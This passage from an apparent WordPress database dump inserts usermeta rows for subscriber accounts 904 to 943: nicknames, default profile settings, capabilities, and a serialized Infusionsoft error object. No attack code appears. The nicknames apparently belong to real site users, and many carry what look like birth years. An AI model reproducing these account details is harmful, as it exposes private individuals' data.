(11869, 904, 'cyb_user_level', '0'),
(11870, 904, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11871, 904, 'default_password_nag', '1'),
(11872, 905, 'nickname', 'sweetjas11983'),
(11873, 905, 'first_name', ''),
(11874, 905, 'last_name', ''),
(11875, 905, 'description', ''),
(11876, 905, 'rich_editing', 'true'),
(11877, 905, 'comment_shortcuts', 'false'),
(11878, 905, 'admin_color', 'fresh'),
(11879, 905, 'use_ssl', '0'),
(11880, 905, 'show_admin_bar_front', 'true'),
(11881, 905, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11882, 905, 'cyb_user_level', '0'),
(11883, 905, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11884, 905, 'default_password_nag', '1'),
(11885, 906, 'nickname', 'jessicalodenkirby2000'),
(11886, 906, 'first_name', ''),
(11887, 906, 'last_name', ''),
(11888, 906, 'description', ''),
(11889, 906, 'rich_editing', 'true'),
(11890, 906, 'comment_shortcuts', 'false'),
(11891, 906, 'admin_color', 'fresh'),
(11892, 906, 'use_ssl', '0'),
(11893, 906, 'show_admin_bar_front', 'true'),
(11894, 906, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11895, 906, 'cyb_user_level', '0'),
(11896, 906, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11897, 906, 'default_password_nag', '1'),
(11898, 907, 'nickname', 'sostaugler2010'),
(11899, 907, 'first_name', ''),
(11900, 907, 'last_name', ''),
(11901, 907, 'description', ''),
(11902, 907, 'rich_editing', 'true'),
(11903, 907, 'comment_shortcuts', 'false'),
(11904, 907, 'admin_color', 'fresh'),
(11905, 907, 'use_ssl', '0'),
(11906, 907, 'show_admin_bar_front', 'true');
INSERT INTO `cyb_usermeta` (`umeta_id`, `user_id`, `meta_key`, `meta_value`) VALUES
(11907, 907, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11908, 907, 'cyb_user_level', '0'),
(11909, 907, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11910, 907, 'default_password_nag', '1'),
(11911, 908, 'nickname', 'aspreti2005'),
(11912, 908, 'first_name', ''),
(11913, 908, 'last_name', ''),
(11914, 908, 'description', ''),
(11915, 908, 'rich_editing', 'true'),
(11916, 908, 'comment_shortcuts', 'false'),
(11917, 908, 'admin_color', 'fresh'),
(11918, 908, 'use_ssl', '0'),
(11919, 908, 'show_admin_bar_front', 'true'),
(11920, 908, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11921, 908, 'cyb_user_level', '0'),
(11922, 908, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11923, 908, 'default_password_nag', '1'),
(11924, 909, 'nickname', 'mcelroy19691957'),
(11925, 909, 'first_name', ''),
(11926, 909, 'last_name', ''),
(11927, 909, 'description', ''),
(11928, 909, 'rich_editing', 'true'),
(11929, 909, 'comment_shortcuts', 'false'),
(11930, 909, 'admin_color', 'fresh'),
(11931, 909, 'use_ssl', '0'),
(11932, 909, 'show_admin_bar_front', 'true'),
(11933, 909, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11934, 909, 'cyb_user_level', '0'),
(11935, 909, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11936, 909, 'default_password_nag', '1'),
(11937, 910, 'nickname', 'albrights20012002'),
(11938, 910, 'first_name', ''),
(11939, 910, 'last_name', ''),
(11940, 910, 'description', ''),
(11941, 910, 'rich_editing', 'true'),
(11942, 910, 'comment_shortcuts', 'false'),
(11943, 910, 'admin_color', 'fresh'),
(11944, 910, 'use_ssl', '0'),
(11945, 910, 'show_admin_bar_front', 'true'),
(11946, 910, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11947, 910, 'cyb_user_level', '0'),
(11948, 910, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11949, 910, 'default_password_nag', '1'),
(11950, 911, 'nickname', 'pnpwilcoxson1997'),
(11951, 911, 'first_name', ''),
(11952, 911, 'last_name', ''),
(11953, 911, 'description', ''),
(11954, 911, 'rich_editing', 'true'),
(11955, 911, 'comment_shortcuts', 'false'),
(11956, 911, 'admin_color', 'fresh'),
(11957, 911, 'use_ssl', '0'),
(11958, 911, 'show_admin_bar_front', 'true'),
(11959, 911, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11960, 911, 'cyb_user_level', '0'),
(11961, 911, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11962, 911, 'default_password_nag', '1'),
(11963, 912, 'nickname', 'robin1987'),
(11964, 912, 'first_name', ''),
(11965, 912, 'last_name', ''),
(11966, 912, 'description', ''),
(11967, 912, 'rich_editing', 'true'),
(11968, 912, 'comment_shortcuts', 'false'),
(11969, 912, 'admin_color', 'fresh'),
(11970, 912, 'use_ssl', '0'),
(11971, 912, 'show_admin_bar_front', 'true'),
(11972, 912, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11973, 912, 'cyb_user_level', '0'),
(11974, 912, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11975, 912, 'default_password_nag', '1'),
(11976, 913, 'nickname', 'degeltruckcenter1971'),
(11977, 913, 'first_name', ''),
(11978, 913, 'last_name', ''),
(11979, 913, 'description', ''),
(11980, 913, 'rich_editing', 'true'),
(11981, 913, 'comment_shortcuts', 'false'),
(11982, 913, 'admin_color', 'fresh'),
(11983, 913, 'use_ssl', '0'),
(11984, 913, 'show_admin_bar_front', 'true'),
(11985, 913, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11986, 913, 'cyb_user_level', '0'),
(11987, 913, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(11988, 913, 'default_password_nag', '1'),
(11989, 914, 'nickname', 'saldeluca2003'),
(11990, 914, 'first_name', ''),
(11991, 914, 'last_name', ''),
(11992, 914, 'description', ''),
(11993, 914, 'rich_editing', 'true'),
(11994, 914, 'comment_shortcuts', 'false'),
(11995, 914, 'admin_color', 'fresh'),
(11996, 914, 'use_ssl', '0'),
(11997, 914, 'show_admin_bar_front', 'true'),
(11998, 914, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(11999, 914, 'cyb_user_level', '0'),
(12000, 914, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12001, 914, 'default_password_nag', '1'),
(12002, 915, 'nickname', 'debramarrington1980'),
(12003, 915, 'first_name', ''),
(12004, 915, 'last_name', ''),
(12005, 915, 'description', ''),
(12006, 915, 'rich_editing', 'true'),
(12007, 915, 'comment_shortcuts', 'false'),
(12008, 915, 'admin_color', 'fresh'),
(12009, 915, 'use_ssl', '0'),
(12010, 915, 'show_admin_bar_front', 'true'),
(12011, 915, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12012, 915, 'cyb_user_level', '0'),
(12013, 915, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12014, 915, 'default_password_nag', '1'),
(12015, 916, 'nickname', 'extreme2hacker2000'),
(12016, 916, 'first_name', ''),
(12017, 916, 'last_name', ''),
(12018, 916, 'description', ''),
(12019, 916, 'rich_editing', 'true'),
(12020, 916, 'comment_shortcuts', 'false'),
(12021, 916, 'admin_color', 'fresh'),
(12022, 916, 'use_ssl', '0'),
(12023, 916, 'show_admin_bar_front', 'true'),
(12024, 916, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12025, 916, 'cyb_user_level', '0'),
(12026, 916, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12027, 916, 'default_password_nag', '1'),
(12028, 917, 'nickname', 'kschall311952'),
(12029, 917, 'first_name', ''),
(12030, 917, 'last_name', ''),
(12031, 917, 'description', ''),
(12032, 917, 'rich_editing', 'true'),
(12033, 917, 'comment_shortcuts', 'false'),
(12034, 917, 'admin_color', 'fresh'),
(12035, 917, 'use_ssl', '0'),
(12036, 917, 'show_admin_bar_front', 'true'),
(12037, 917, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12038, 917, 'cyb_user_level', '0'),
(12039, 917, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12040, 917, 'default_password_nag', '1'),
(12041, 918, 'nickname', 'theresahawkins1977'),
(12042, 918, 'first_name', ''),
(12043, 918, 'last_name', ''),
(12044, 918, 'description', ''),
(12045, 918, 'rich_editing', 'true'),
(12046, 918, 'comment_shortcuts', 'false'),
(12047, 918, 'admin_color', 'fresh'),
(12048, 918, 'use_ssl', '0'),
(12049, 918, 'show_admin_bar_front', 'true'),
(12050, 918, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12051, 918, 'cyb_user_level', '0'),
(12052, 918, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12053, 918, 'default_password_nag', '1'),
(12054, 919, 'nickname', 'litana2003'),
(12055, 919, 'first_name', ''),
(12056, 919, 'last_name', ''),
(12057, 919, 'description', ''),
(12058, 919, 'rich_editing', 'true'),
(12059, 919, 'comment_shortcuts', 'false'),
(12060, 919, 'admin_color', 'fresh'),
(12061, 919, 'use_ssl', '0'),
(12062, 919, 'show_admin_bar_front', 'true'),
(12063, 919, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12064, 919, 'cyb_user_level', '0'),
(12065, 919, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12066, 919, 'default_password_nag', '1'),
(12067, 920, 'nickname', 'chelseag15111993'),
(12068, 920, 'first_name', ''),
(12069, 920, 'last_name', ''),
(12070, 920, 'description', ''),
(12071, 920, 'rich_editing', 'true'),
(12072, 920, 'comment_shortcuts', 'false'),
(12073, 920, 'admin_color', 'fresh'),
(12074, 920, 'use_ssl', '0'),
(12075, 920, 'show_admin_bar_front', 'true'),
(12076, 920, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12077, 920, 'cyb_user_level', '0'),
(12078, 920, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12079, 920, 'default_password_nag', '1'),
(12080, 921, 'nickname', 'davidsou131973'),
(12081, 921, 'first_name', ''),
(12082, 921, 'last_name', ''),
(12083, 921, 'description', ''),
(12084, 921, 'rich_editing', 'true'),
(12085, 921, 'comment_shortcuts', 'false'),
(12086, 921, 'admin_color', 'fresh'),
(12087, 921, 'use_ssl', '0'),
(12088, 921, 'show_admin_bar_front', 'true'),
(12089, 921, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12090, 921, 'cyb_user_level', '0'),
(12091, 921, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12092, 921, 'default_password_nag', '1'),
(12093, 922, 'nickname', 'hyperhacktive11984'),
(12094, 922, 'first_name', ''),
(12095, 922, 'last_name', ''),
(12096, 922, 'description', ''),
(12097, 922, 'rich_editing', 'true'),
(12098, 922, 'comment_shortcuts', 'false'),
(12099, 922, 'admin_color', 'fresh'),
(12100, 922, 'use_ssl', '0'),
(12101, 922, 'show_admin_bar_front', 'true'),
(12102, 922, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12103, 922, 'cyb_user_level', '0'),
(12104, 922, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12105, 922, 'default_password_nag', '1'),
(12106, 923, 'nickname', 'enquiries1961'),
(12107, 923, 'first_name', ''),
(12108, 923, 'last_name', ''),
(12109, 923, 'description', ''),
(12110, 923, 'rich_editing', 'true'),
(12111, 923, 'comment_shortcuts', 'false'),
(12112, 923, 'admin_color', 'fresh'),
(12113, 923, 'use_ssl', '0'),
(12114, 923, 'show_admin_bar_front', 'true'),
(12115, 923, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12116, 923, 'cyb_user_level', '0'),
(12117, 923, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12118, 923, 'default_password_nag', '1'),
(12119, 924, 'nickname', 'rgcargen1972'),
(12120, 924, 'first_name', ''),
(12121, 924, 'last_name', ''),
(12122, 924, 'description', ''),
(12123, 924, 'rich_editing', 'true'),
(12124, 924, 'comment_shortcuts', 'false'),
(12125, 924, 'admin_color', 'fresh'),
(12126, 924, 'use_ssl', '0'),
(12127, 924, 'show_admin_bar_front', 'true'),
(12128, 924, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12129, 924, 'cyb_user_level', '0'),
(12130, 924, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12131, 924, 'default_password_nag', '1'),
(12132, 925, 'nickname', 'cyberdeepwebhacker2010'),
(12133, 925, 'first_name', ''),
(12134, 925, 'last_name', ''),
(12135, 925, 'description', ''),
(12136, 925, 'rich_editing', 'true'),
(12137, 925, 'comment_shortcuts', 'false'),
(12138, 925, 'admin_color', 'fresh'),
(12139, 925, 'use_ssl', '0'),
(12140, 925, 'show_admin_bar_front', 'true'),
(12141, 925, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12142, 925, 'cyb_user_level', '0'),
(12143, 925, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12144, 925, 'default_password_nag', '1'),
(12145, 926, 'nickname', 'mpressnitz1976'),
(12146, 926, 'first_name', ''),
(12147, 926, 'last_name', ''),
(12148, 926, 'description', ''),
(12149, 926, 'rich_editing', 'true'),
(12150, 926, 'comment_shortcuts', 'false'),
(12151, 926, 'admin_color', 'fresh'),
(12152, 926, 'use_ssl', '0'),
(12153, 926, 'show_admin_bar_front', 'true'),
(12154, 926, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12155, 926, 'cyb_user_level', '0'),
(12156, 926, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12157, 926, 'default_password_nag', '1'),
(12158, 927, 'nickname', 'mrss_aprilpruitt1997'),
(12159, 927, 'first_name', ''),
(12160, 927, 'last_name', ''),
(12161, 927, 'description', ''),
(12162, 927, 'rich_editing', 'true'),
(12163, 927, 'comment_shortcuts', 'false'),
(12164, 927, 'admin_color', 'fresh'),
(12165, 927, 'use_ssl', '0'),
(12166, 927, 'show_admin_bar_front', 'true'),
(12167, 927, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12168, 927, 'cyb_user_level', '0'),
(12169, 927, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12170, 927, 'default_password_nag', '1'),
(12171, 928, 'nickname', 'gazzbizz1969'),
(12172, 928, 'first_name', ''),
(12173, 928, 'last_name', ''),
(12174, 928, 'description', ''),
(12175, 928, 'rich_editing', 'true'),
(12176, 928, 'comment_shortcuts', 'false'),
(12177, 928, 'admin_color', 'fresh'),
(12178, 928, 'use_ssl', '0'),
(12179, 928, 'show_admin_bar_front', 'true'),
(12180, 928, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12181, 928, 'cyb_user_level', '0'),
(12182, 928, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12183, 928, 'default_password_nag', '1'),
(12184, 929, 'nickname', 'tattletale402007'),
(12185, 929, 'first_name', ''),
(12186, 929, 'last_name', ''),
(12187, 929, 'description', ''),
(12188, 929, 'rich_editing', 'true'),
(12189, 929, 'comment_shortcuts', 'false'),
(12190, 929, 'admin_color', 'fresh'),
(12191, 929, 'use_ssl', '0'),
(12192, 929, 'show_admin_bar_front', 'true'),
(12193, 929, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12194, 929, 'cyb_user_level', '0'),
(12195, 929, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12196, 929, 'default_password_nag', '1'),
(12197, 930, 'nickname', 'joji41992'),
(12198, 930, 'first_name', ''),
(12199, 930, 'last_name', ''),
(12200, 930, 'description', ''),
(12201, 930, 'rich_editing', 'true'),
(12202, 930, 'comment_shortcuts', 'false'),
(12203, 930, 'admin_color', 'fresh'),
(12204, 930, 'use_ssl', '0'),
(12205, 930, 'show_admin_bar_front', 'true'),
(12206, 930, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12207, 930, 'cyb_user_level', '0'),
(12208, 930, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12209, 930, 'default_password_nag', '1'),
(12210, 931, 'nickname', 'hmorrison8241985'),
(12211, 931, 'first_name', ''),
(12212, 931, 'last_name', ''),
(12213, 931, 'description', ''),
(12214, 931, 'rich_editing', 'true'),
(12215, 931, 'comment_shortcuts', 'false'),
(12216, 931, 'admin_color', 'fresh'),
(12217, 931, 'use_ssl', '0'),
(12218, 931, 'show_admin_bar_front', 'true'),
(12219, 931, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12220, 931, 'cyb_user_level', '0'),
(12221, 931, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12222, 931, 'default_password_nag', '1'),
(12223, 932, 'nickname', 'rajnesvenssohn2005'),
(12224, 932, 'first_name', ''),
(12225, 932, 'last_name', ''),
(12226, 932, 'description', ''),
(12227, 932, 'rich_editing', 'true'),
(12228, 932, 'comment_shortcuts', 'false'),
(12229, 932, 'admin_color', 'fresh'),
(12230, 932, 'use_ssl', '0'),
(12231, 932, 'show_admin_bar_front', 'true'),
(12232, 932, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12233, 932, 'cyb_user_level', '0'),
(12234, 932, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12235, 932, 'default_password_nag', '1'),
(12236, 933, 'nickname', 'kellymacl091962'),
(12237, 933, 'first_name', ''),
(12238, 933, 'last_name', ''),
(12239, 933, 'description', ''),
(12240, 933, 'rich_editing', 'true'),
(12241, 933, 'comment_shortcuts', 'false'),
(12242, 933, 'admin_color', 'fresh'),
(12243, 933, 'use_ssl', '0'),
(12244, 933, 'show_admin_bar_front', 'true'),
(12245, 933, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12246, 933, 'cyb_user_level', '0'),
(12247, 933, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12248, 933, 'default_password_nag', '1'),
(12249, 934, 'nickname', 'pattymayhorn1983'),
(12250, 934, 'first_name', ''),
(12251, 934, 'last_name', ''),
(12252, 934, 'description', ''),
(12253, 934, 'rich_editing', 'true'),
(12254, 934, 'comment_shortcuts', 'false'),
(12255, 934, 'admin_color', 'fresh'),
(12256, 934, 'use_ssl', '0'),
(12257, 934, 'show_admin_bar_front', 'true'),
(12258, 934, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12259, 934, 'cyb_user_level', '0'),
(12260, 934, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12261, 934, 'default_password_nag', '1'),
(12262, 935, 'nickname', 'cwdegn1977'),
(12263, 935, 'first_name', ''),
(12264, 935, 'last_name', ''),
(12265, 935, 'description', ''),
(12266, 935, 'rich_editing', 'true'),
(12267, 935, 'comment_shortcuts', 'false'),
(12268, 935, 'admin_color', 'fresh'),
(12269, 935, 'use_ssl', '0'),
(12270, 935, 'show_admin_bar_front', 'true'),
(12271, 935, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12272, 935, 'cyb_user_level', '0'),
(12273, 935, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12274, 935, 'default_password_nag', '1'),
(12275, 936, 'nickname', 'valentine5192009'),
(12276, 936, 'first_name', ''),
(12277, 936, 'last_name', ''),
(12278, 936, 'description', ''),
(12279, 936, 'rich_editing', 'true'),
(12280, 936, 'comment_shortcuts', 'false'),
(12281, 936, 'admin_color', 'fresh'),
(12282, 936, 'use_ssl', '0'),
(12283, 936, 'show_admin_bar_front', 'true'),
(12284, 936, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12285, 936, 'cyb_user_level', '0'),
(12286, 936, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12287, 936, 'default_password_nag', '1'),
(12288, 937, 'nickname', 'dlin541971'),
(12289, 937, 'first_name', ''),
(12290, 937, 'last_name', ''),
(12291, 937, 'description', ''),
(12292, 937, 'rich_editing', 'true'),
(12293, 937, 'comment_shortcuts', 'false'),
(12294, 937, 'admin_color', 'fresh'),
(12295, 937, 'use_ssl', '0'),
(12296, 937, 'show_admin_bar_front', 'true'),
(12297, 937, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12298, 937, 'cyb_user_level', '0'),
(12299, 937, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12300, 937, 'default_password_nag', '1'),
(12301, 938, 'nickname', 'wirelesscenter5041951'),
(12302, 938, 'first_name', ''),
(12303, 938, 'last_name', ''),
(12304, 938, 'description', ''),
(12305, 938, 'rich_editing', 'true'),
(12306, 938, 'comment_shortcuts', 'false'),
(12307, 938, 'admin_color', 'fresh'),
(12308, 938, 'use_ssl', '0'),
(12309, 938, 'show_admin_bar_front', 'true'),
(12310, 938, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12311, 938, 'cyb_user_level', '0'),
(12312, 938, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12313, 938, 'default_password_nag', '1'),
(12314, 939, 'nickname', 'achastain241994'),
(12315, 939, 'first_name', ''),
(12316, 939, 'last_name', ''),
(12317, 939, 'description', ''),
(12318, 939, 'rich_editing', 'true'),
(12319, 939, 'comment_shortcuts', 'false'),
(12320, 939, 'admin_color', 'fresh'),
(12321, 939, 'use_ssl', '0'),
(12322, 939, 'show_admin_bar_front', 'true'),
(12323, 939, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12324, 939, 'cyb_user_level', '0'),
(12325, 939, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12326, 939, 'default_password_nag', '1'),
(12327, 940, 'nickname', 'tpyara2000'),
(12328, 940, 'first_name', ''),
(12329, 940, 'last_name', ''),
(12330, 940, 'description', ''),
(12331, 940, 'rich_editing', 'true'),
(12332, 940, 'comment_shortcuts', 'false'),
(12333, 940, 'admin_color', 'fresh'),
(12334, 940, 'use_ssl', '0'),
(12335, 940, 'show_admin_bar_front', 'true'),
(12336, 940, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12337, 940, 'cyb_user_level', '0'),
(12338, 940, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12339, 940, 'default_password_nag', '1'),
(12340, 941, 'nickname', 'valenciad301974'),
(12341, 941, 'first_name', ''),
(12342, 941, 'last_name', ''),
(12343, 941, 'description', ''),
(12344, 941, 'rich_editing', 'true'),
(12345, 941, 'comment_shortcuts', 'false'),
(12346, 941, 'admin_color', 'fresh'),
(12347, 941, 'use_ssl', '0'),
(12348, 941, 'show_admin_bar_front', 'true'),
(12349, 941, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12350, 941, 'cyb_user_level', '0'),
(12351, 941, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12352, 941, 'default_password_nag', '1'),
(12353, 942, 'nickname', 'elshouba1951'),
(12354, 942, 'first_name', ''),
(12355, 942, 'last_name', ''),
(12356, 942, 'description', ''),
(12357, 942, 'rich_editing', 'true'),
(12358, 942, 'comment_shortcuts', 'false'),
(12359, 942, 'admin_color', 'fresh'),
(12360, 942, 'use_ssl', '0'),
(12361, 942, 'show_admin_bar_front', 'true'),
(12362, 942, 'cyb_capabilities', 'a:1:{s:10:"subscriber";b:1;}'),
(12363, 942, 'cyb_user_level', '0'),
(12364, 942, '_infusionsoft_contact_id', 'O:8:"WP_Error":2:{s:6:"errors";a:1:{s:15:"invalid-request";a:1:{i:0;s:23:"[InvalidKey]Invalid Key";}}s:10:"error_data";a:0:{}}'),
(12365, 942, 'default_password_nag', '1'),
(12366, 943, 'nickname', 'risoli2008'),
(12367, 943, 'first_name', ''),
(12368, 943, 'last_name', ''),
(12369, 943, 'description', ''),
(12370, 943, 'rich_editing', 'true'),
(12371, 943, 'comment_shortcuts', 'false'),
(12372, 943, 'admin_color', 'fresh'),
(12373, 943, 'use_ssl', '0'),
(12374, 943, 'show_admin_bar_front', 'true'),
